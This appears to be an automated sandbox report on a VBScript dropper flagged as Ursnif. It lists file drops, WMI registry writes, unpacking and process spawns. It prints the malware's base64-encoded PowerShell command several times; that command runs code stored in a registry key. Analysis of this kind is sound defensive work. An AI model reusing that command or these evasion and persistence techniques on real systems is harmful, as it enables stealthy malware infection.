Source: Yara match	File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00401EB5 NtQueryVirtualMemory,	4_2_00401EB5
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00724498 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError,	4_2_00724498
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00721D96 memcpy,memcpy,lstrcatW,CreateEventA,_wcsupr,lstrlenW,NtQueryInformationProcess,CloseHandle,	4_2_00721D96
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00721CCC RtlInitUnicodeString,NtSetValueKey,NtDeleteValueKey,NtClose,RtlNtStatusToDosError,	4_2_00721CCC
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_007212AF RtlInitUnicodeString,NtCreateKey,	4_2_007212AF

Detected potential crypto function

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00401C94	4_2_00401C94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_0072B3F0	4_2_0072B3F0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_0072AB9A	4_2_0072AB9A

Java / VBScript file with very long strings (likely obfuscated code)

Show sources

Source: Nuovo documento 1.vbs

Initial sample: Strings found which are bigger than 50

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.evad.winVBS@35/66@14/2

Creates files inside the user directory

Show sources

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active

Jump to behavior

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\BD0F010C-8477-D729-4003-A9471CBE2200
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_01

Creates temporary files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Jump to behavior

Executes visual basic scripts

Show sources

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Reads ini files

Show sources

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Show sources

Source: Nuovo documento 1.vbs	Virustotal: Detection: 10%
Source: Nuovo documento 1.vbs	ReversingLabs: Detection: 12%

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9500 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\forfiles.exe 'C:\Windows\System32\forfiles.exe' /p C:\Windows\system32 /s /c 'cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==' /m pll.e
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\cmd.exe /c 'powershell.exe' -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBhAGcAaQBjAGwAbwAnACkALgBSAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B18.tmp' 'c:\Users\user\AppData\Local\Temp\CSC77BC04006FB247D3A31CB167F1BAF8A.TMP'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Submission file is bigger than most known malware samples

Show sources

Source: Nuovo documento 1.vbs

Static file information: File size 8681858 > 1048576

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Unpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Unpacked PE file: 4.2.PaintHelper.exe.400000.0.unpack

Compiles C# or VB.Net code

Show sources

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f2oqx0oi.cmdline'

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Code function: 4_2_00401A88 GetModuleHandleW,LoadLibraryW,GetProcAddress,

4_2_00401A88

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_00401C83 push ecx; ret	4_2_00401C93
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006BB7C0 push edx; ret	4_2_006BB94E
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B6056 push cs; retf	4_2_006B6058
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B64DE push ebx; ret	4_2_006B64DF
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B2900 push cs; iretd	4_2_006B2901
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B09E2 push edx; iretd	4_2_006B09ED
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B11E6 push ecx; ret	4_2_006B11E7
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B05DD push edx; ret	4_2_006B05E2
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B5F0E push ecx; ret	4_2_006B5F27
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_006B47AF pushfd ; iretd	4_2_006B47B0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe	Code function: 4_2_0072B3DF push ecx; ret	4_2_0072B3EF

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
